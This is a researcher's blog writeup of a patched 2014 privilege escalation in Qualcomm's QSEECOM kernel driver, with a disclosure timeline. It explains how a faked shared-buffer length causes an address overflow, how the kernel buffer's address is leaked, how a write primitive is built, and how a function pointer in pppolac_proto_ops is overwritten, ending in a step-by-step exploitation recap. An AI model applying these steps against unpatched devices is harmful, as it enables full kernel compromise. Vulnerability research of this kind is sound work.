In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which enables arbitrary code execution within the kernel.
The vulnerability affected all devices based on Qualcomm chipsets (that is, based on the "msm" kernel) since February 2012.
I'd like to point out that I've responsibly disclosed this issue to Qualcomm, and they've been great as usual, and fixed the issue pretty quickly (see "Timeline" below). Those of you who are interested in the fix, should definitely check out the link above.
Where are we at?
Continuing our journey of getting from zero permissions to TrustZone code execution; after recently completing the task of getting to TrustZone from the Linux kernel, we are now looking for a way to gain code execution within the Linux kernel.
However, as you will see shortly, the vulnerability presented in this post requires some permissions to exploit, namely, it can be exploited from within a process called "mediaserver". This means that it still doesn't complete our journey, and so the next few blog posts will be dedicated to completing the exploit chain, by gaining code execution in mediaserver from zero permissions.
Since we would like to attack the Linux kernel, it stands to reason that we would take a look at all the drivers which are accessible to "underprivileged" Android users. First, let's take a look at all the drivers which are world accessible (under "/dev"):
After spending a while looking at each of these drivers, it became apparent that a more effective strategy would be to cast a wider net by expanding the number of drivers to be researched, even if they require some permissions in order to interact with. Then, once a vulnerability is found, we would simply need one more vulnerability in order to get from zero permissions to TrustZone.
One interesting candidate for research is the "qseecom" driver. For those of you who read the first blog post, we've already mentioned this driver before. This is the driver responsible for allowing Android code to interact with the TrustZone kernel, albeit using only a well defined set of commands.
So why is this driver interesting? For starters, it ties in well with the previous blog posts, and everybody loves continuity :) That aside, this driver has quite a large and fairly complicated implementation, which, following the previous posts, we are sufficiently qualified to understand and follow.
Most importantly, taking a look at the permissions needed to interact with the driver, reveals that we must either be running with the "system" user-ID which is a very high requirement, or we must belong to the group called "drmrpc".
However, searching for the "drmrpc" group within all the processes on the system, reveals that the following processes are members of the group:
- surfaceflinger (running with "system" user-ID)
- drmserver (running with "drm" user-ID)
- mediaserver (running with "media" user-ID)
- keystore (running with "keystore" user-ID)
But that's not all! Within the Linux kernel, each process has a flag named "dumpable", which controls whether or not the process can be attached to using ptrace. Whenever a process changes its permissions by executing "setuid" or "setgid", the flag is automatically cleared by the kernel to indicate that the process cannot be attached to.
While the "surfaceflinger" and "drmserver" processes modify their user-IDs during runtime, and by doing so protect themselves from foreign "ptrace" attachments, the "mediaserver" and "keystore" processes do not.
This is interesting since attaching to a process via "ptrace" allows full control of the process's memory, and therefore enables code execution within that process. As a result, any process running with the same user-ID as one of these two processes can take control of them and by doing so, may access the "qseecom" driver.
Summing it up, this means that in order to successfully access the "qseecom" driver, an attacker must only satisfy one of the following conditions:
- Gain execution within one of "mediaserver", "drmserver", "mediaserver" or "keystore"
- Run within a process with the "system", "drm" or "keystore" user-ID
- Run within a process with the "drmrpc" group-ID
Before we start inspecting the driver's code, we should first recall the (mis)trust relationship between user-space and kernel-space.
Since drivers deal with user input, they must take extreme caution to never trust user supplied data, and always verify it extensively - all arguments passed in by the user should be considered by the kernel as "tainted". While this may sound obvious, it's a really important issue that is overlooked often times by kernel developers.
In order to stop kernel developers from making these kinds of mistakes, some mechanisms were introduced into the kernel's code which help the compiler detect and prevent such attempts.
This is facilitated by marking variables which point to memory within the user's virtual address space as such, by using the "__user" macro.
Instead, whenever the kernel wishes to either read from or write to the pointer's location, it must do so using specially crafted kernel functions which make sure that the location pointed to actually resides within the user's address space (and not within any memory address belonging to the kernel).
Getting to know QSEECOM
Drivers come in many shapes and sizes; and can be interacted with by using quite a wide variety of functions, each of which with its unique pitfalls and common mistakes.
When character devices are registered within the kernel, they must provide a structure containing pointers to the device's implementation for each of the aforementioned functions, determining how it interacts with the system.
This means that an initial step in mapping out the attack surface for this driver would be to take a look at the functions registered by it:
IOCTLs are called using two arguments:
- The "command" to be executed
- The "argument" to be supplied to that function
Having said that, lets take a look at the different commands supported by the qseecom_ioctl function. At first glance, it seems as though quite a large range of commands are supported by the driver, such as:
- Sending command requests to TrustZone
- Loading QSEE TrustZone applications
- Provisioning different encryption keys
- Setting memory parameters for the client of the driver
In order to allow the user to send large requests to or receive large responses from the TrustZone kernel, the QSEECOM driver exposes a IOCTL command which enables the user to set up his "memory parameters".
In order to share a large chunk of memory with the kernel, the user first allocates a contiguous physical chunk of memory by using the "ion" driver.
We won't go into detail about the "ion" driver, but here's the gist of it - it is an Android driver which is used to allocate contiguous physical memory and expose it to the user by means of a file descriptor. After receiving a file descriptor, the user may then map it to any chosen virtual address, then use it as he pleases. This mechanism is advantageous as a means of sharing memory since anyone in possession of the file descriptor may map it to any address within their own virtual address space, independently of one another.
The "ion" driver also supports different kinds of pools from which memory can be allocated, and a wide variety of flags - for those interested, you can read much more about "ion" and how it works, here.
In the case of QSEECOM, three parameters are used to configure the user's memory parameters:
- virt_sb_base - The virtual address at which the user decided to map the ION allocated chunk
- sb_len - The length of the shared buffer used
- ifd_data_fd - The "ion" file descriptor corresponding to the allocated chunk
Note that four different parameters are stored here:
- The kernel-space virtual address at which the ION buffer is mapped
- The actual physical address of the ION buffer
- The user-space virtual address at which the ION buffer is mapped
- The length of the shared buffer
After going over the code for each of the different supported commands, one command in particular seemed to stick-out as a prime candidate for exploitation - QSEECOM_IOCTL_SEND_MODFD_CMD_REQ.
This command is used in order to request the driver to send a command to TrustZone using user-provided buffers. As we know, any interaction of the kernel with user-provided data, let alone user-provided memory addresses, is potentially volatile.
After some boilerplate code and internal housekeeping, the actual function in charge of handling this particular IOCTL command is called - "qseecom_send_modfd_command".
The function first safely copies the IOCTL argument supplied by the user into a local structure, which looks like this:
The "cmd_req_buf" and "cmd_req_len" fields define the request buffer for the command to be sent, and similarly, "resp_buf" and "resp_len" define the response buffer to which the result should be written.
Now stop! Do you notice anything fishy in the structure above?
For starters, there are two pointers within this structure which are not marked as "tainted" in any way (not marked as "__user"), which means that the driver might mistakenly access them later on.
What comes next, however, is a quite an intimidating wall of verifications which are meant to make sure that the given arguments are, in fact, valid. It seems as though Quacomm win this round...
Or do they?
Well, let's look at each of the validations performed:
- First, the function makes sure that the request and response buffers are not NULL.
- Next, the function makes sure that both the request and response buffers are within the range of the shared buffer discussed earlier.
- Then, the function makes sure that the request buffer's length is larger than zero, and that both the request and the response size do not exceed the shared buffer's length.
- Lastly, for each file descriptor passed, the function validates that the command buffer offset does not exceed the length of the command buffer.
After performing all these validations, the function goes on to convert the request and response buffers from user virtual addresses to kernel virtual addresses:
What comes next, however, is extremely interesting! The driver passes on the request and response buffers, which should now reside within kernel-space, to an internal function called "__qseecom_update_cmd_buf" - and therein lies the holy grail! The function actually writes data to the converted kernel-space address of the request buffer.
We'll expand more on the exact nature of the data written later on, but hopefully by now you're convinced if we are able to bypass the verifications above while still maintaining control of the final kernel-space address of the request buffer, we would achieve a kernel write primitive, which seems quite tempting.
"Bring down this wall!"
First, let's start by mapping out the locations of the request and response buffers within the virtual address space:
Now, as we already know, when setting the memory parameters, the buffer starting at "virt_sb_base" and ending at "virt_sb_base + sb_len" must reside entirely within user-space. This is facilitated by the following check:
Also, the verifications above make sure that both the "cmd_req_buf" and "resp_buf" pointers are within the user-space virtual address range of the shared buffer.
However, what would happen if we were to map a huge shared buffer - one so large that it cannot be contained within kernel space? Well, a safe assumption might be that when we'd attempt to set the memory parameters for this buffer, the request would fail, since the kernel will not be able to map the buffer to it's virtual address space.
Luckily, though, the IOCTL with which the memory parameters are set only uses the user-provided buffer length in order to verify that the user-space range of the shared buffer is accessible by the user (see the access check above). However, when it actually maps the buffer to its own address-space, it does so by simply using the ION file descriptor, without verifying that the buffer's actual length equals the one provided by the user.
This means we could allocate a small ION buffer, and pass it to QSEECOM while claiming it actually corresponds to a huge area. As long as the entire area lies within user-space and is write-accessible to the user, the driver will happily accept these parameters and store them for us. But is this feasible? After all, we can't really allocate such a huge chunk of memory within user-space - there's just not enough physical memory to satisfy such a request. What we could do, however, is reserve this memory area by using mmap. This means that until the data is actually written to, it is not allocated, and therefore we can freely map an area of any size for the duration of the validation performed above, then unmap it once the driver is satisfied that the area is indeed writeable.
From now on, let's assume we map the fake shared buffer at the virtual address 0x10000000 and the mapping size is 0x80000000.
Recall that if the command and response buffer are deemed valid, they are converted to the corresponding kernel-space virtual addresses, then the converted request buffer is written to at the given offset. Putting it all together, we are left with the following actual write destination:
Can you spot the mistake in the calculation above? Here it goes -
Since the kernel believes the shared buffer is huge, this means that the "cmd_req_buf" may point to any address within that range, and in our case, any address within the range [0x10000000, 0x90000000]. It also means that the "cmd_buf_offset" can be as large as 0x80000000, which is the fake size of the shared buffer.
Adding up two such huge numbers would doubtless cause an overflow in the calculation above, which means that the resulting address may not be within the kernel's shared buffer after all!
(Before you read on, you may want to try and work the needed values to exploit this on your own.)
Finding the kernel's shared buffer
As you can see in the calculation above, the location of the kernel's shared buffer is still unknown to us. This is because it is mapped during runtime, and this information is not exposed to the user in any way. However, this doesn't mean we can't find it on our own.
If we were to set the "cmd_buf_offset" to zero, that would mean that the destination write address for the kernel would be:
sb_virt - 0x10000000 + cmd_req_buf + 0x0
Now, since we know the "sb_virt" address is actually within the kernel's heap, it must be within the kernel's memory range (that is, larger than 0xC0000000). This means that for values of "cmd_req_buf" that are larger than (0xFFFFFFFF - 0xD0000000), the calculation above would surely overflow, resulting in a low user-space address.
This turns out to be really helpful. We can now allocate a sterile "dropzone" within the lower range of addresses in user-space, and fill it with a single known value.
Then, after we trigger the driver's write primitive, using the parameters described above, we could inspect the dropzone and find out where it has been "disturbed" - that is, where has a value been changed. Since we know only a single overflow happened in the destination address calculation, this means that we can simply reverse the calculation (and add 0xFFFFFFFF + 1) to find the original address of "sb_virt".
Creating a controlled write primitive
Now that we know the exact address of "sb_virt", we are free to manipulate the arguments accordingly in order to control the destination address freely. Recall that the destination address is structured like so:
- user_virt_sb_base = 0x10000000
- cmd_req_buf + cmd_buf_offset = (0xFFFFFFFF + 1) + 0x10000000 + wanted_offset
dest_addr = sb_virt - user_virt_sb_base + cmd_req_buf + cmd_buf_offset
Substituting the variables with the values above:
dest_addr = sb_virt - 0x10000000 + (0xFFFFFFFF + 1) + 0x10000000 + wanted_offset
dest_addr = sb_virt + (0xFFFFFFFF + 1) + wanted_offset
But since adding 0xFFFFFFFF + 1 will cause an overflow which will result in the same original value, we are therefore left with:
dest_addr = sb_virt + wanted_offset
Meaning we can easily control the destination to which the primitive will write its data, by choosing the corresponding "wanted_offset" for each destination address.
Exploiting the write primitive
Now that we have a write primitive, all that's left is for us to exploit it. Fortunately, our write primitive allows us to overwrite any kernel address. However, we still cannot control the data written - actually, going over the code of the vulnerable "__qseecom_update_cmd_buf" reveals that it actually writes a physical address related to the ION buffer to the target address:
With that in mind, all that's left for us is to overwrite a function pointer within the kernel with our write primitive. Since the DWORD written will correspond to an address which is within the user's virtual address space, we can simply allocate an executable code stub at that address, and redirect execution from that function stub to any other desired piece of code.
One such location containing function pointers can be found within the "pppolac_proto_ops" structure. This is the structure used within the kernel to register the function pointers used when interacting with sockets of the PPP_OLAC protocol. This structure is suitable because:
- The PPP_OLAC protocol isn't widely used, so there's no immediate need to restore the overwritten function pointer
- There are no special permissions needed in order to open a PPP_OLAC socket, other than the ability to create sockets
- The structure itself is static (and therefore stored in the BSS), and is not marked as "const", and is therefore writeable
Putting it all together
At this point, we have the ability to execute arbitrary code within the kernel, thus completing our exploit. Here's a short recap of the steps we needed to perform:
- Open the QSEECOM driver
- Map a ION buffer
- Register faulty memory parameters which include a fake huge memory buffer
- Prepare a sterile dropzone in low user-space addresses
- Trigger the write primitive into a low user-space address
- Inspect the dropzone in order to deduce the address of "sb_virt" and the contents written in the write primitive
- Allocate a small function stub at the address which is written by the write primitive
- Trigger the write primitive in order to overwrite a function pointer within "pppolac_proto_ops"
- Open a PPP_OLAC socket and trigger a call to the overwritten function pointer
- Execute code within the kernel :)
Shortly after the patch was issued and the vulnerability was fixed, I was alerted by a friend on mine to the fact that an exploit has been developed for the vulnerability and the exploit has been incorporated into a popular rooting kit (giefroot), in order to achieve kernel code execution.
Luckily, the exploit for the vulnerability was quite poorly written (I've fully reverse engineered it), and so it didn't support all the range of vulnerable devices.
Now that the issue has been fixed for a while, I feel that it's okay to share the full vulnerability writeup and exploit code, since all devices with kernels compiled after November 2014 should be patched. I've also made sure to use a single symbol within the exploit, to prevent widespread usage by script-kiddies (although this constraint can easily be removed by dynamically finding the pointer mentioned above during the exploit).
I've written an exploit for this vulnerability, you can find it here.
Building the exploit actually produces a shared library, which exports a function called "execute_in_kernel". You may use it to execute any given function within the context of the kernel. Play safe!
- 24.09.14 - Vulnerability disclosed
- 24.09.14 - Initial response from QC
- 30.09.14 - Issue triaged by QC
- 19.11.14 - QC issues notice to customers
- 27.12.14 - Issue closed, CAF advisory issued